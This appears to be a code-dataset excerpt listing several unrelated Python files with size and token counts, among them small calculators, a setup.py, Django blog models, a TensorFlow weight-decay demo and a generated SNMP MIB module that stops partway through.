text string | size int64 | token_count int64 |
|---|---|---|
# Paint-can calculator: reads an area in m², computes the paint needed
# (1 litre covers 3 m²) and how many whole 18-litre cans must be bought.
t = float(input('informe o tamanho em m² '))  # area to paint, in m²
l = t / 3  # litres of paint required (coverage: 3 m² per litre)
# BUG FIX: cans are sold whole, so round up on any remainder and print an
# integer count (the original printed e.g. "2.000000 latas" via %f).
latas = int(l // 18) + (1 if l % 18 != 0 else 0)
print('voce precisara de %d latas ' % latas)
print('Preço: R$ %0.2f' % (latas * 80))  # each 18 L can costs R$ 80.00
| 283 | 145 |
from os import path
from setuptools import setup, find_packages

# Read the long description from the README that sits next to this file.
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()

setup(
    name='pyAMD',
    version='0.1.0',
    description='A tool to find the optimal mesh density for visualising macrosegregation -- An extension to MakeContour',
    long_description=long_description,
    url='https://github.com/wildthingz/pyAMD',
    author='Hatef Khadivinassab',
    author_email='hatef.hadivinassab@gmail.com',
    packages=['pyAMD'],
    classifiers=[
        "Development Status :: 3 - Alpha",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3.4",
        "Programming Language :: Python :: 3.5",
        # BUG FIX: a missing comma here used to merge the Linux and MacOS
        # entries into one invalid classifier via implicit string
        # concatenation; the Linux classifier itself was also not a real
        # trove classifier ("Operating System :: Linux :: Linux Debian").
        "Operating System :: POSIX :: Linux",
        "Operating System :: MacOS :: MacOS X",
        "Operating System :: Microsoft :: Windows",
        # (duplicate "Programming Language :: Python :: 2.7" entry removed)
        'Framework :: Spyder',
        'Intended Audience :: End Users/Desktop',
        'Natural Language :: English',
    ],
    license='Creative Commons Attribution-Noncommercial-Share Alike license',
    # Typo fixed: "visaliziation" -> "visualization".
    keywords=['AMD', 'macrosegregation', 'mesh density', 'visualization', 'contour'],
)
| 1,254 | 415 |
"""
Models for blog app
"""
from datetime import date
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
from nablapps.core.models import TimeStamped
class Blog(models.Model):
    """
    Represents a blog which can have multiple blog entries/posts.

    Posts reference it through ``BlogPost.blog`` (reverse name ``posts``).
    """
    # Display name of the blog.
    name = models.CharField(
        max_length=80,
        verbose_name="Navn"
    )
    # URL-friendly identifier; derived from ``name`` on first save().
    slug = models.SlugField(
        unique=True,
        blank=True,
        null=True,
        editable=True,
    )
    # Creation date; auto_now_add stamps it on insert.
    created = models.DateField(
        auto_now_add=True,
        verbose_name="Opprettet"
    )
    class Meta:
        verbose_name = "Blogg"
        verbose_name_plural = "Blogger"
        db_table = "content_blog"
    def save(self, *args, **kwargs): # pylint: disable=W0221
        # Only on the first save (no primary key yet): set the creation date
        # and derive the slug from the name, so renames keep old URLs stable.
        # NOTE(review): ``created`` uses auto_now_add, so Django overwrites
        # this manual assignment on insert anyway — confirm it is needed.
        if not self.id:
            self.created = date.today()
            self.slug = slugify(self.name)
        return super().save(*args, **kwargs)
    def __str__(self):
        return self.name
    def get_absolute_url(self):
        """Return canonical url for the blog"""
        return reverse('blog', kwargs={'blog': self.slug})
class BlogPost(TimeStamped, models.Model):
    """
    A single blog post belonging to a specific blog
    """
    # Owning blog; deleting the blog deletes its posts.
    blog = models.ForeignKey(
        Blog,
        related_name="posts",
        verbose_name="Blogg",
        on_delete=models.CASCADE
    )
    # Post headline.
    title = models.CharField(
        max_length=80,
        verbose_name="Tittel"
    )
    # URL-friendly identifier; regenerated from ``title`` on every save().
    slug = models.SlugField(
        unique=True,
        blank=True,
        editable=True,
    )
    # Markdown body of the post.
    content = models.TextField(
        verbose_name="Innhold",
        help_text="Her kan du skrive i Markdown"
    )
    # Optional thumbnail used in list views.
    list_image = models.ImageField(
        upload_to="blogpics",
        verbose_name="Listebilde",
        help_text="Bilde som vises i listevisningen av bloggene",
        blank=True,
        null=True
    )
    class Meta:
        verbose_name = "Post"
        verbose_name_plural = "Poster"
        db_table = "content_blogpost"
    def save(self, *args, **kwargs): # pylint: disable=W0221
        # NOTE(review): unlike Blog.save, the slug is regenerated on *every*
        # save, so renaming a post changes its URL — confirm this is intended.
        self.slug = slugify(self.title)
        return super().save(*args, **kwargs)
    def __str__(self):
        return self.title
    def get_absolute_url(self):
        """Return canonical url for the blog post"""
        return reverse('blog_post', kwargs={'blog': self.blog.slug, 'slug': self.slug})
| 2,407 | 767 |
# -*- coding: utf-8 -*-
"""
@author: Rafaela BF
Solve a complete quadratic equation (Ax² + Bx + C = 0) with Bhaskara's formula.

The equation is read as free text such as "2x²+3x-5" and parsed by locating
the "²" and "x" characters; ``aux`` first holds the three textual pieces and
is then overwritten with the integer coefficients A, B, C.
"""
eq = input("Entre com a equação: ")
aux =[""]*3  # [A-term, B-term, C-term] as text, later as ints
i = eq.find("²", 0)  # everything up to and including "²" is the A term
aux[0] = eq[0:(i+1)]
j = eq.find("x", i)  # the next "x" closes the B term
aux[1] = eq[(i+1):(j+1)]
aux[2] = eq[(j+1):len(eq)]  # the remainder is the constant C
i = 0
j = 0
# A: coefficient of x². Bare "x²" means 1, "-x²" means -1; otherwise the
# digits before "x²" are converted to int.
if len(aux[0]) < 3:
    aux[0] = 1
elif aux[0].find('-', 0) != -1:
    if len(aux[0]) < 4:
        aux[0] = -1
    else:
        i = aux[0].find("x²", 0)
        aux[0] = int(aux[0][0:i])
else:
    i = aux[0].find("x²", 0)
    aux[0] = int(aux[0][0:i])
# B: coefficient of x, same convention as A.
if len(aux[1]) < 2:
    aux[1] = 1
elif aux[1].find('-', 0) != -1:
    if len(aux[1]) < 3:
        aux[1] = -1
    else:
        i = aux[1].find("x", 0)
        aux[1] = int(aux[1][0:i])
else:
    i = aux[1].find("x", 0)
    aux[1] = int(aux[1][0:i])
# C: constant term.
aux[2] = int(aux[2])
# Echo the parsed equation.
print()
print(f"A equação: {eq}")
print(f"Onde A = {aux[0]} B = {aux[1]} C = {aux[2]}")
# Roots via Bhaskara.
# NOTE(review): a negative discriminant makes **(1/2) return a complex
# number and the ":.2f" format below then raises TypeError — confirm the
# program is only used with equations that have real roots.
print()
print("Tem raízes: ")
x1 = (-aux[1] + (aux[1]**2 - 4*aux[0]*aux[2])**(1/2))/(2*aux[0])
print(f"X1 = {(x1):.2f}")
x2 = (-aux[1] - (aux[1]**2 - 4*aux[0]*aux[2])**(1/2))/(2*aux[0])
print(f"X2 = {(x2):.2f}")
# Vertex of the parabola: Xv = -B/2A, Yv = -Δ/4A.
print()
print("Vértices: ")
print(f"Xv = {((-aux[1])/(2*aux[0])):.2f}")
print(f"Yv = {((-(aux[1]**2 - 4*aux[0]*aux[2]))/(4*aux[0])):.2f}")
# Factored form A(x - x1)(x - x2) = 0.
print()
print("sua Forma Fatorada é: ")
print(f"{aux[0]} * (X - ({(x1):.2f})) * (X - ({(x2):.2f})) = 0")
# Concavity is given by the sign of A.
print()
print("Concavidade da parábola é:", end=" ")
if aux[0] > 0:
    print("voltada para cima")
else:
    print("voltada para baixo")
| 1,654 | 872 |
# -*- coding: utf-8 -*-
# @Time : 2020/4/20 11:46
# @Author : wwwzk
# @FileName: weight_decay_test.py
'''
L2范数正则化权重衰减
'''
import tensorflow as tf
from tensorflow.keras import layers,optimizers,models,initializers
import numpy as np
import matplotlib.pyplot as plt
import tensorflow.keras as ks
from liner_test import linreg,squared_loss,sgd
from fit_test import semilogy
# Build a synthetic linear-regression dataset designed to overfit:
# only 20 training samples but 200 input features.
n_train,n_test,num_input=20,100,200
# Ground-truth parameters: every weight 0.01, bias 0.05.
true_w,true_b=tf.ones((num_input,1))*0.01,0.05
features = tf.random.normal(shape=(n_train+n_test,num_input))
# labels = X @ w + b, plus Gaussian noise.
labels=ks.backend.dot(features,true_w)+true_b
labels+=tf.random.normal(mean=0.01,shape=labels.shape)
# First n_train rows are the training split, the rest the test split.
train_features,test_features=features[:n_train,:],features[n_train:,:]
train_labels,test_labels=labels[:n_train],labels[n_train:]
# Randomly (re-)initialise the trainable model parameters.
def init_params():
    """Return freshly initialised [w, b] tf.Variables for the linear model."""
    weight = tf.Variable(tf.random.normal(mean=1, shape=(num_input, 1)))
    bias = tf.Variable(tf.zeros(shape=(1,)))
    return [weight, bias]
# L2 (squared-norm) penalty used as the weight-decay term.
def l2_penalty(w):
    """Return ||w||^2 / 2 as a scalar tensor."""
    return tf.reduce_sum(tf.square(w)) / 2
# Hyper-parameters: batch size, epochs, learning rate.
batch_size,num_epochs,lr=1,100,0.003
# Network: the hand-written linear model and squared loss from liner_test.
net,loss=linreg,squared_loss
optimizer=ks.optimizers.SGD()
# BUG FIX: the pipeline used ``.batch(batch_size).shuffle(batch_size)``,
# i.e. it shuffled *batches* with a buffer of size 1 — a no-op. Shuffle the
# individual samples over the whole training set first, then batch.
train_iter = tf.data.Dataset.from_tensor_slices((train_features,train_labels)).shuffle(n_train).batch(batch_size)
# Train the linear model with an explicit L2 weight-decay term and plot
# the train/test loss curves on a semilog axis.
def fit_and_plot(lambd):
    """Train with weight-decay strength ``lambd`` and report loss curves."""
    w, b = init_params()
    train_history, test_history = [], []
    for _ in range(num_epochs):
        for X, y in train_iter:
            with tf.GradientTape() as tape:
                # Objective = data loss + lambd * L2 penalty on the weights.
                objective = loss(net(X, w, b), y) + lambd * l2_penalty(w)
            grads = tape.gradient(objective, [w, b])
            sgd([w, b], lr, batch_size, grads)
        train_history.append(
            tf.reduce_mean(loss(net(train_features, w, b), train_labels)).numpy())
        test_history.append(
            tf.reduce_mean(loss(net(test_features, w, b), test_labels)).numpy())
    semilogy(range(1, num_epochs + 1), train_history, 'epochs', 'loss',
             range(1, num_epochs + 1), test_history, ['train', 'test'])
    print('L2 norm of w:', tf.norm(w).numpy())
# Baseline run without weight decay (expected to overfit).
fit_and_plot(lambd=0)
# Run with weight decay (lambda=3): L2 norm of w should shrink.
fit_and_plot(lambd=3)
| 2,107 | 928 |
# Read a 3x3 matrix of ints from the user and pretty-print it.
# The original repeated the read loop once per row; the nested loops below
# produce byte-identical prompts without the duplication.
lista = [[], [], []]
for linha in range(0, 3):
    for coluna in range(0, 3):
        num = int(input(f'Digite um valor para [{linha}, {coluna}]: '))
        lista[linha].append(num)
print('-='*30)
# Print each value centred in a 5-character cell.
print(f'[{lista[0][0]:^5}][{lista[0][1]:^5}][{lista[0][2]:^5}]')
print(f'[{lista[1][0]:^5}][{lista[1][1]:^5}][{lista[1][2]:^5}]')
print(f'[{lista[2][0]:^5}][{lista[2][1]:^5}][{lista[2][2]:^5}]') | 548 | 272 |
#
# PySNMP MIB module S5-ETH-MULTISEG-TOPOLOGY-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/S5-ETH-MULTISEG-TOPOLOGY-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:51:22 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# NOTE: this module is machine-generated by pysmi from the ASN.1 MIB source.
# ``mibBuilder`` is injected into the module namespace by the pysnmp MIB
# loader at load time, which is why it is used below without an import.
# --- Resolve base ASN.1/SMI types and helpers from already-loaded modules ---
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
InterfaceIndex, = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex")
s5EnMsTop, = mibBuilder.importSymbols("S5-ROOT-MIB", "s5EnMsTop")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Counter64, Gauge32, ModuleIdentity, Integer32, Counter32, MibIdentifier, IpAddress, iso, ObjectIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, Bits, Unsigned32, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "Gauge32", "ModuleIdentity", "Integer32", "Counter32", "MibIdentifier", "IpAddress", "iso", "ObjectIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "Bits", "Unsigned32", "NotificationType")
TextualConvention, DisplayString, MacAddress = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString", "MacAddress")
SnpxChassisType, SnpxBackplaneType = mibBuilder.importSymbols("SYNOPTICS-ROOT-MIB", "SnpxChassisType", "SnpxBackplaneType")
# --- Module identity and revision history ---
s5EthMultisegTopologyMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 0))
s5EthMultisegTopologyMib.setRevisions(('2009-08-18 00:00', '2006-09-13 00:00', '2006-09-12 00:00', '2004-07-20 00:00',))
if mibBuilder.loadTexts: s5EthMultisegTopologyMib.setLastUpdated('200908180000Z')
if mibBuilder.loadTexts: s5EthMultisegTopologyMib.setOrganization('Nortel Networks')
# --- Subtree identifiers under s5EnMsTop ---
s5EnMsTopInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1))
s5EnMsTopNmm = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2))
s5EnMsTopBdg = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3))
s5EnMsTopSrcMac = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 4))
s5EnMsTopPort = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 5))
# --- Global topology scalars ---
s5EnMsTopIpAddr = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 1), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopIpAddr.setStatus('current')
s5EnMsTopStatus = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("topOn", 1), ("topOff", 2))).clone('topOn')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: s5EnMsTopStatus.setStatus('current')
s5EnMsTopNmmLstChg = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 3), TimeTicks()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmLstChg.setStatus('current')
s5EnMsTopBdgLstChg = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 4), TimeTicks()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgLstChg.setStatus('deprecated')
s5EnMsTopNmmMaxNum = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmMaxNum.setStatus('current')
s5EnMsTopNmmCurNum = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmCurNum.setStatus('current')
s5EnMsTopBdgMaxNum = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgMaxNum.setStatus('deprecated')
s5EnMsTopBdgCurNum = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgCurNum.setStatus('deprecated')
# --- NMM (network management module) topology table ---
s5EnMsTopNmmTable = MibTable((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1), )
if mibBuilder.loadTexts: s5EnMsTopNmmTable.setStatus('current')
s5EnMsTopNmmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1), ).setIndexNames((0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmSlot"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmPort"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmIpAddr"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmSegId"))
if mibBuilder.loadTexts: s5EnMsTopNmmEntry.setStatus('current')
s5EnMsTopNmmSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmSlot.setStatus('current')
s5EnMsTopNmmPort = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmPort.setStatus('current')
s5EnMsTopNmmIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmIpAddr.setStatus('current')
s5EnMsTopNmmSegId = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmSegId.setStatus('current')
s5EnMsTopNmmMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 5), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmMacAddr.setStatus('current')
s5EnMsTopNmmChassisType = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 6), SnpxChassisType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmChassisType.setStatus('current')
s5EnMsTopNmmBkplType = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 7), SnpxBackplaneType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmBkplType.setStatus('current')
s5EnMsTopNmmLocalSeg = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("true", 1), ("false", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmLocalSeg.setStatus('current')
s5EnMsTopNmmCurState = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("topChanged", 1), ("heartbeat", 2), ("new", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmCurState.setStatus('current')
s5EnMsTopNmmEosSize = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1440))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmEosSize.setStatus('current')
s5EnMsTopNmmEosTable = MibTable((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 3), )
if mibBuilder.loadTexts: s5EnMsTopNmmEosTable.setStatus('current')
s5EnMsTopNmmEosEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 3, 1), ).setIndexNames((0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmSlot"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmPort"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmIpAddr"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmSegId"))
if mibBuilder.loadTexts: s5EnMsTopNmmEosEntry.setStatus('current')
s5EnMsTopNmmEos = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 3, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 1400))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmEos.setStatus('current')
# --- Bridge topology table (deprecated subtree) ---
s5EnMsTopBdgTable = MibTable((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1), )
if mibBuilder.loadTexts: s5EnMsTopBdgTable.setStatus('deprecated')
s5EnMsTopBdgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1), ).setIndexNames((0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopBdgSlotNum"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopBdgPortNum"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopBdgIpAddr"))
if mibBuilder.loadTexts: s5EnMsTopBdgEntry.setStatus('deprecated')
s5EnMsTopBdgSlotNum = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgSlotNum.setStatus('deprecated')
s5EnMsTopBdgPortNum = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgPortNum.setStatus('deprecated')
s5EnMsTopBdgIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgIpAddr.setStatus('deprecated')
s5EnMsTopBdgNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgNumber.setStatus('deprecated')
s5EnMsTopBdgMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 5), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgMacAddr.setStatus('deprecated')
s5EnMsTopBdgType = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("other", 1), ("localSyn", 2), ("remoteSyn", 3), ("kalpana", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgType.setStatus('deprecated')
s5EnMsTopBdgNumPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgNumPorts.setStatus('deprecated')
s5EnMsTopBdgStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("active", 2), ("standby", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgStatus.setStatus('deprecated')
s5EnMsTopBdgHelloPortNum = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgHelloPortNum.setStatus('deprecated')
s5EnMsTopBdgHelloPortType = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("other", 1), ("eth", 2), ("tok4", 3), ("tok16", 4), ("fddi", 5), ("t1", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgHelloPortType.setStatus('deprecated')
s5EnMsTopBdgHelloPortStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("active", 2), ("standby", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgHelloPortStatus.setStatus('deprecated')
s5EnMsTopBdgCompBdgMac1 = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 12), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgCompBdgMac1.setStatus('deprecated')
s5EnMsTopBdgCompBdgMac2 = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 13), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgCompBdgMac2.setStatus('deprecated')
s5EnMsTopBdgEosSize = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1440))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgEosSize.setStatus('deprecated')
s5EnMsTopBdgEosTable = MibTable((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 3), )
if mibBuilder.loadTexts: s5EnMsTopBdgEosTable.setStatus('deprecated')
s5EnMsTopBdgEosEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 3, 1), ).setIndexNames((0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopBdgSlotNum"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopBdgPortNum"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopBdgIpAddr"))
if mibBuilder.loadTexts: s5EnMsTopBdgEosEntry.setStatus('deprecated')
s5EnMsTopBdgEos = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 3, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 1400))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgEos.setStatus('deprecated')
# --- Source MAC address table (deprecated subtree) ---
s5EnMsTopSrcMacAddrTable = MibTable((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 4, 1), )
if mibBuilder.loadTexts: s5EnMsTopSrcMacAddrTable.setStatus('deprecated')
s5EnMsTopSrcMacAddrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 4, 1, 1), ).setIndexNames((0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopSrcMacAddr"))
if mibBuilder.loadTexts: s5EnMsTopSrcMacAddrEntry.setStatus('deprecated')
s5EnMsTopSrcMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 4, 1, 1, 1), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopSrcMacAddr.setStatus('deprecated')
s5EnMsTopSrcMacSegId = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 4, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopSrcMacSegId.setStatus('deprecated')
s5EnMsTopSrcMacAddrLstChg = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 4, 2), TimeTicks()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopSrcMacAddrLstChg.setStatus('deprecated')
# --- Per-port topology state table ---
s5EnMsTopPortTable = MibTable((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 5, 1), )
if mibBuilder.loadTexts: s5EnMsTopPortTable.setStatus('current')
s5EnMsTopPortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 5, 1, 1), ).setIndexNames((0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopPortIfIndex"))
if mibBuilder.loadTexts: s5EnMsTopPortEntry.setStatus('current')
s5EnMsTopPortIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 5, 1, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: s5EnMsTopPortIfIndex.setStatus('current')
s5EnMsTopPortState = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 5, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("topActive", 1), ("topPassthru", 2))).clone('topActive')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: s5EnMsTopPortState.setStatus('current')
# Export every symbol so other MIB modules can resolve them by name.
